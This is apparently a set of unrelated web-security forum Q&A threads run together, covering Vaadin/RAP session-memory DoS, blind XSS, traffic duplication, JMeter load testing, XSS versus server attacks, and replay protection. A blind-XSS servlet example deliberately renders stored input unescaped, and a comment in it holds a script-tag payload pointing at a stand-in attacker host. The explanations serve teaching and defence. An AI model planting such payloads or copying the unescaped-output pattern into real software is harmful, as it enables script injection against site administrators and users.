Vaadin and Eclipse RAP/RWT are web application frameworks with - as far as I understand - similar architectures. My question is whether an application built with Vaadin or RAP is prone to denial-of-service attacks. I am currently evaluating the frameworks and want to be sure that this is not a concern.
Here is my reasoning:
With Vaadin or RAP you don't build HTML output but instead construct a widget tree, similar to a Swing/SWT application (in the case of RAP it actually is SWT). The framework renders the widget tree as HTML in the browser and sends user interactions back to the server, where the application is notified in terms of events. The events are delivered to listener objects which have previously been registered on widgets.
Therefore the widget tree must be kept in some sort of user session, and it of course consumes some memory.
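As a concrete illustration of that model, here is a minimal sketch loosely based on Vaadin 8-style APIs (class and method names vary between framework versions): both the widget tree and the click listener live on the server for as long as the session does.

    import com.vaadin.server.VaadinRequest;
    import com.vaadin.ui.Button;
    import com.vaadin.ui.Label;
    import com.vaadin.ui.UI;
    import com.vaadin.ui.VerticalLayout;

    // One instance of this UI (and its whole widget tree) is created per
    // browser tab and kept inside the HTTP session on the server.
    public class HelloUI extends UI {
        @Override
        protected void init(VaadinRequest request) {
            VerticalLayout layout = new VerticalLayout();
            Label greeting = new Label("Hello");
            Button button = new Button("Click me");
            // The listener object stays on the server; the browser click is
            // sent back as a request and delivered to it as an event.
            button.addClickListener(event -> greeting.setValue("Clicked"));
            layout.addComponents(greeting, button);
            setContent(layout);
        }
    }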
If the application is public (i.e. does not sit behind a login page), then it seems there is a possible denial-of-service attack against such an application:
Just fire requests at the app's landing page, perhaps faking a first response. For each such request, the framework will build a new widget tree, which will live on the server for some time, until the session expires. The server's memory should therefore fill up with dangling user sessions very quickly.
Or do these frameworks have built-in protection against this scenario?
Thanks.
A framework alone cannot protect you from DoS attacks.
Vaadin has some features built in to prevent attacks, but of course these features depend on how you code your application.
There is a long webinar about Vaadin security:
https://vaadin.com/de/blog/-/blogs/vaadin-application-security-webinar
Vaadin does some validation of the client <-> server traffic
to prevent XSS and other attacks.
But if you do certain unusual things, you can open the door to such attacks.
As for the scenario you described:
The initial Vaadin session takes some memory on the server (just as sessions do on any other server).
How large this memory footprint is depends on the initial number of widgets and on what you load into memory for them (DB connections etc.).
Usually this is not a problem when you have a very lightweight login page.
But if you display large tables and many other fancy things, then you will have to have enough memory for the expected number of requests. (The same applies to all other HTTP servers/applications; they also need memory for this.)
If the number of requests surpasses the capacity of your server, any web service can be brought down by a DoS attack.
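The frameworks themselves won't stop this, but the servlet container underneath gives you some knobs. As a hedged sketch (the "authenticatedUser" attribute name is made up for illustration), one mitigation is to keep unauthenticated sessions short-lived so abandoned widget trees are reclaimed quickly:

    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpSession;

    public class SessionTuning {
        static void shortenAnonymousSession(HttpServletRequest request) {
            HttpSession session = request.getSession();
            if (session.getAttribute("authenticatedUser") == null) {
                // Expire anonymous sessions after 60 seconds of inactivity
                // instead of the classic 30 minutes, limiting how long a
                // flood of bogus sessions can occupy memory.
                session.setMaxInactiveInterval(60);
            }
        }
    }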
EDIT:
Due to good points in André's answer, I want to sharpen my question.
First of all, I agree, of course: if you put an application behind a login wall,
then the DoS threat is not that big. At least you can identify the attacking user. And the login page itself can
be lightweight, or need not even be implemented with Vaadin/RAP.
And as Vaadin/RAP applications are most likely used in RIA-style intranet settings, the DoS scenario does not invalidate
their use in those settings.
But at least both frameworks themselves expose demo pages without logins on the internet:
See http://www.eclipse.org/rap/demos/ and http://demo.vaadin.com/dashboard/
These are not simple pages, and they probably use quite a bit of memory.
My concern is about exactly such a scenario: a non-access-restricted internet page.
Once these frameworks have responded to a request, they must keep server-side memory for that request for quite some time
(say the classical 30 minutes of an HTTP session; at least on the scale of minutes).
Or to put it differently: if the application retains memory per initial user request for some substantial time, it will be
prone to DoS attacks.
Contrast this with an old-style round-trip web application which does not require user identification.
All the information needed to decide what to return is contained in the request (path, parameters, HTTP method, ...),
so a stateless server is possible.
If the user interacts with such an application, the application is still free to store session-persistent data on the client
(shopping cart contents in a cookie, etc.).
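For contrast, here is a minimal sketch of that stateless style in plain servlet Java (names illustrative; a real application would encode, sign, and size-limit the cookie value): the cart lives entirely in the cookie, so no per-user server memory outlives the request.

    import java.io.IOException;
    import javax.servlet.http.Cookie;
    import javax.servlet.http.HttpServlet;
    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;

    public class CartServlet extends HttpServlet {
        @Override
        protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
            // Everything needed to answer is carried by the request itself.
            String cart = "";
            if (req.getCookies() != null) {
                for (Cookie c : req.getCookies()) {
                    if (c.getName().equals("cart")) cart = c.getValue();
                }
            }
            String item = req.getParameter("add");
            if (item != null) {
                cart = cart.isEmpty() ? item : cart + "-" + item;
                resp.addCookie(new Cookie("cart", cart)); // state goes back to the client
            }
            resp.setContentType("text/plain");
            resp.getWriter().println("Cart: " + cart);
        }
    }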
There is something I wonder about. Take XSS as an example: we say it is divided into three types - blind, reflected, and stored. Everyone knows reflected and stored. With blind XSS, the "blind" at the beginning of its name says the attacker has no information about the vulnerability. But if there is no information, how does the attacker find out that any vulnerability exists at all?
Thanks in advance.
In blind XSS the attacker typically doesn't know at first whether his attack will succeed.
You can think of it like setting up a trap: you don't know if it will succeed, or if the victim has protection. You are blind.
Actually, blind XSS vulnerabilities are a variant of stored (persistent) XSS vulnerabilities. The attacker's input is saved by a web server and then executed as a malicious script in another application or in another part of the application.
For example, an attacker injects a malicious payload into a contact/feedback form and POSTs it (setting up the trap). Let's say the submitted info is then served by another application or in another part of the app:
The admin opens his admin panel/dashboard to view feedback from his users. When the administrator of the application reviews the feedback entries, the attacker's payload is loaded and executed.
The attacker was blind: he didn't know whether the server side of that form sanitizes the input, or whether the "admin panel" of the application has any protection against JS execution.
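To make the trap concrete, here is a minimal servlet-style sketch in Java (the FeedbackStore class and URL mappings are hypothetical, not from the post; the two public classes are shown together for brevity but would live in separate files): input is stored verbatim and later rendered unescaped in another part of the application, which is exactly the stored/blind pattern described above.

    import java.io.IOException;
    import java.io.PrintWriter;
    import javax.servlet.annotation.WebServlet;
    import javax.servlet.http.HttpServlet;
    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;

    @WebServlet("/feedback")
    public class FeedbackServlet extends HttpServlet {
        @Override
        protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws IOException {
            // The trap: a payload such as <script src="https://attacker.example/hook.js"></script>
            // is stored without any sanitization.
            FeedbackStore.save(req.getParameter("message"));
            resp.sendRedirect("/thanks.html");
        }
    }

    @WebServlet("/admin/feedback")
    public class AdminFeedbackServlet extends HttpServlet {
        @Override
        protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
            resp.setContentType("text/html");
            PrintWriter out = resp.getWriter();
            for (String message : FeedbackStore.findAll()) {
                // Vulnerable: raw output. The payload executes in the admin's
                // browser, possibly days or weeks after it was planted.
                out.println("<p>" + message + "</p>");
                // Fix: HTML-encode the value before printing it.
            }
        }
    }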
Examples of web applications and web pages where blind XSS attacks can occur:
Contact/Feedback pages
Log viewers
Exception handlers
Chat applications / forums
Customer ticket applications
Web Application Firewalls
Any application that requires user moderation
In the case of blind XSS, the payload may only be executed after a long period of time, when the administrator visits the vulnerable page. It can take hours, days, or even weeks until the payload runs.
Therefore, this type of vulnerability is much harder to detect than reflected XSS vulnerabilities, where the input is reflected immediately.
I want to replicate web traffic from a production server to another instance of the application (a pre-production environment), so that I can verify that any improvements (e.g. performance-wise) that were introduced (and tested, of course) remain improvements under production-like load.
(Obviously, something that is clearly a performance improvement during tests might turn out not to be one in production, for example when trading time against memory usage.)
There are tools like
teeproxy (https://serverfault.com/questions/729368/replicating-web-application-traffic-to-another-instance-for-testing, https://github.com/chrislusf/teeproxy/blob/master/teeproxy.go)
duplicator (Duplicate TCP traffic with a proxy, https://github.com/agnoster/duplicator)
but they don't seem to address the fact that the duplicated web traffic will get
different session cookies
different CSRF tokens (in my case this is covered by JSF view state ids)
Is there a tool that could do that automatically?
I had a similar concern and opened an issue here.
Also, since it is an open project, I wanted to see if I could inject my own logic.
I am stuck there: adding headers to the Diffy proxy before multicasting.
I don't have enough reputation to comment, so I added this as an answer.
Twitter's Diffy is specialized for duplicating HTTP traffic.
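I'm not aware of a tool that remaps sessions out of the box; conceptually, the duplicating proxy has to keep its own mapping from production session cookies to shadow-environment session cookies. Here is a rough sketch of that idea in plain Java (host names are placeholders, headers other than Cookie are not forwarded, and it deliberately ignores the much harder problem of rewriting CSRF tokens / JSF view state ids inside the body):

    import com.sun.net.httpserver.HttpServer;
    import java.io.OutputStream;
    import java.net.InetSocketAddress;
    import java.net.URI;
    import java.net.http.HttpClient;
    import java.net.http.HttpRequest;
    import java.net.http.HttpResponse;
    import java.util.Map;
    import java.util.concurrent.ConcurrentHashMap;

    public class TeeProxySketch {
        static final HttpClient CLIENT = HttpClient.newHttpClient();
        // Production session cookie -> session cookie valid on the shadow instance.
        static final Map<String, String> SESSION_MAP = new ConcurrentHashMap<>();

        public static void main(String[] args) throws Exception {
            HttpServer server = HttpServer.create(new InetSocketAddress(8080), 0);
            server.createContext("/", exchange -> {
                byte[] body = exchange.getRequestBody().readAllBytes();
                String method = exchange.getRequestMethod();
                URI path = exchange.getRequestURI();
                String cookie = exchange.getRequestHeaders().getFirst("Cookie");

                // 1. Forward to production and hand its answer back to the client.
                HttpResponse<byte[]> primary = forward("https://prod.example", method, path, cookie, body);
                long len = primary.body().length == 0 ? -1 : primary.body().length;
                exchange.sendResponseHeaders(primary.statusCode(), len);
                try (OutputStream os = exchange.getResponseBody()) { os.write(primary.body()); }

                // 2. Duplicate to pre-production with a remapped session cookie.
                // A real tool would also parse Set-Cookie from the shadow response
                // and update SESSION_MAP accordingly.
                String shadowCookie = cookie == null ? null : SESSION_MAP.getOrDefault(cookie, cookie);
                forward("https://preprod.example", method, path, shadowCookie, body);
            });
            server.start();
        }

        static HttpResponse<byte[]> forward(String base, String method, URI path, String cookie, byte[] body) {
            try {
                HttpRequest.Builder b = HttpRequest.newBuilder(URI.create(base + path))
                        .method(method, HttpRequest.BodyPublishers.ofByteArray(body));
                if (cookie != null) b.header("Cookie", cookie);
                return CLIENT.send(b.build(), HttpResponse.BodyHandlers.ofByteArray());
            } catch (Exception e) {
                throw new RuntimeException(e);
            }
        }
    }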
As a newbie to JMeter, I have created some scenarios, like some number of users logging in to the system, sending HTTP requests, requests being looped, etc.
I would like to know what real-world scenarios companies implement to performance-test their systems using JMeter.
Consider an e-commerce website: what scenarios might they consider to performance-test it?
The whole idea of performance testing is generating real-life load on the system, simulating real users as closely as possible. For an e-commerce system it would be something like:
N users searching for some term
M users browsing and navigating
X users making purchases
To simulate different usage scenarios you can use different thread groups or set weights using a Throughput Controller; see the sketch below for the idea.
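Those weights are normally configured inside JMeter itself, but to make the mix concrete, here is a plain-JDK sketch (not JMeter; the URLs and percentages are invented) of the same weighted scenario idea:

    import java.net.URI;
    import java.net.http.HttpClient;
    import java.net.http.HttpRequest;
    import java.net.http.HttpResponse;
    import java.util.concurrent.ThreadLocalRandom;

    public class WeightedLoadSketch {
        static final HttpClient CLIENT = HttpClient.newHttpClient();

        public static void main(String[] args) throws Exception {
            for (int i = 0; i < 100; i++) {
                int roll = ThreadLocalRandom.current().nextInt(100);
                // 60% search, 30% browse, 10% purchase - analogous to
                // weighting thread groups or using a Throughput Controller.
                String path = roll < 60 ? "/search?q=shoes"
                            : roll < 90 ? "/category/electronics"
                            : "/checkout";
                HttpRequest request = HttpRequest.newBuilder(
                        URI.create("https://shop.example" + path)).build();
                CLIENT.send(request, HttpResponse.BodyHandlers.discarding());
            }
        }
    }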
To make your JMeter test look more like a real browser, add the following test elements to your test plan:
HTTP Cookie Manager - to represent browser cookies, simulate different unique sessions and deal with cookie-based authentication
HTTP Cache Manager - to simulate the browser cache. Browsers download embedded resources like images, scripts, styles, etc., but do it only once. The Cache Manager replicates this behavior and also respects cache-control headers.
HTTP Header Manager - to represent browser headers like User-Agent, Accept-Language and so on.
Also, according to How to make JMeter behave more like a real browser, you need to "tell" JMeter to retrieve all embedded resources from pages and to use a concurrent pool of 3 to 5 threads for it. The best place to put this configuration is HTTP Request Defaults.
Hi, an XSS attack is treated as an attack from the client's machine, but is there any way to mount an XSS-style attack against the server?
I want to know whether there is any way to execute code on the server through the client-side interface, as in the case of SQL injection, except that here the target is not the database server but a plain web server or an application server.
Sometimes, it's also possible to use XSS as a vector to trigger and leverage Cross-Site Request Forgery (CSRF) attacks.
Having an XSS on a website is like having control over the JavaScript a user will execute when visiting it. If an administrator stumbles upon your XSS code (either by being sent a malicious link or by means of a stored XSS), then you might get him or her to execute requests or actions on the web server that a normal user usually wouldn't have access to. If you know the webpage layout well enough, you can request pages on the visitor's behalf (backends, user lists, etc.) and have the results sent (exfiltrated) anywhere on the Internet.
You can also use more advanced attack frameworks such as BeEF to attempt to exploit vulnerabilities in your visitor's browser. If the visitor in question is a website administrator, this might yield interesting information to further attack the webserver.
XSS per se won't allow you to execute code on the server, but it's a great vector to leverage other vulnerabilities present on the web application.
Vulnerabilities like XSS or SQL injection are specific instances of a more general problem: improperly concatenating attacker-controllable text into some other format (e.g. SQL, HTML, or JavaScript).
If your server evaluates any such format (e.g. via eval()), it can have similar vulnerabilities.
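To make that concrete, here is a minimal JDBC illustration: the same mistake that produces XSS when concatenating into HTML produces SQL injection when concatenating into SQL, and parameterizing fixes it by passing the text as data rather than as part of the format.

    import java.sql.Connection;
    import java.sql.PreparedStatement;
    import java.sql.ResultSet;
    import java.sql.SQLException;
    import java.sql.Statement;

    public class ConcatDemo {
        // Vulnerable: attacker-controlled text is pasted into the SQL format.
        // name = "x' OR '1'='1" changes the meaning of the query.
        static ResultSet findUserUnsafe(Connection conn, String name) throws SQLException {
            Statement stmt = conn.createStatement();
            return stmt.executeQuery("SELECT * FROM users WHERE name = '" + name + "'");
        }

        // Safe: the text is bound as a parameter and never interpreted as SQL.
        static ResultSet findUserSafe(Connection conn, String name) throws SQLException {
            PreparedStatement stmt = conn.prepareStatement("SELECT * FROM users WHERE name = ?");
            stmt.setString(1, name);
            return stmt.executeQuery();
        }
    }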
The answer to your question is not entirely straightforward.
Specifically, no: you cannot attack a server using XSS by injecting code through its interface.
However, there are ways to "inject" code into the server through its interface and have the server run it. The techniques vary widely and are highly implementation-dependent.
For example, there was a web application that allowed users to upload image files for display. The web application had code that "touched up" the image, and there was a vulnerability in that touch-up code. A malicious user uploaded a carefully prepared, malicious .jpg file that overflowed a buffer in the code and shoveled a shell back to the attacker's machine. In a case like this, the attack was conducted by "injecting" code into the web app through its interface.
As long as you never process user input (other than storing it in the DB and returning it to other users), you should be fairly safe from this type of attack. Probably 99% of web apps need to be much more worried about XSS attacks from users against other users than about code-injection attacks against themselves.
I am architecting a project which uses jQuery to communicate with a single web service hosted inside SharePoint (this point is possibly moot, but I include it for background and to emphasize that session state is not a good fit in a multiple-front-end environment).
The web services are ASP.NET ASMX services which return a JSON model, which is then mapped to the UI using Knockout. To save the form, the converse happens: the JSON model is sent back to the service and persisted.
The client has unveiled a requirement for confidentiality of the data being sent to and from the server:
There is data which should only be sent from the client to the server.
There is data which should only appear in specific views (solvable using ViewModels so not too concerned about this one)
The data should be immune to classic playback (replay) attacks.
Short of building proprietary security, what is the best way to secure the web service, and are there any other libraries, either in JavaScript or .NET, that I should be looking at to assist me?
I'll post this as an answer...for the possibility of points :)...but I don't know that you could easily say there is a "right way" to do this.
The communications sent to the service should of course use HTTPS; that limits man-in-the-middle attacks. I always check that the sending client's IP is the same as the IP address in the host header. That can be spoofed, but it makes the attack a bit more annoying :). Also, I timestamp all of my JSON on the client before sending, then make sure it's within X seconds on the server. That helps to prevent playback attacks.
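The asker's stack is ASP.NET, but the replay-window check described above is stack-agnostic. Here is a minimal sketch of the server-side check in plain Java, assuming the client adds a timestamp field to the JSON just before sending (the field name and window size are illustrative):

    import java.time.Duration;
    import java.time.Instant;

    public class ReplayWindow {
        static final Duration MAX_AGE = Duration.ofSeconds(30); // the "X seconds"

        // clientTimestamp is parsed from the JSON payload's timestamp field.
        static boolean isFresh(Instant clientTimestamp) {
            // Reject anything outside the window, in either direction,
            // to tolerate small clock skew but stop replayed payloads.
            Duration age = Duration.between(clientTimestamp, Instant.now()).abs();
            return age.compareTo(MAX_AGE) <= 0;
        }
    }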
Obviously JavaScript is insecure, and you always need to keep that in mind.
Hopefully that gives you a tiny bit of insight. I'm writing a blog post about this pattern I've been using. It could be helpful for you, but it's not done :(. I'll post a link sometime tonight or tomorrow.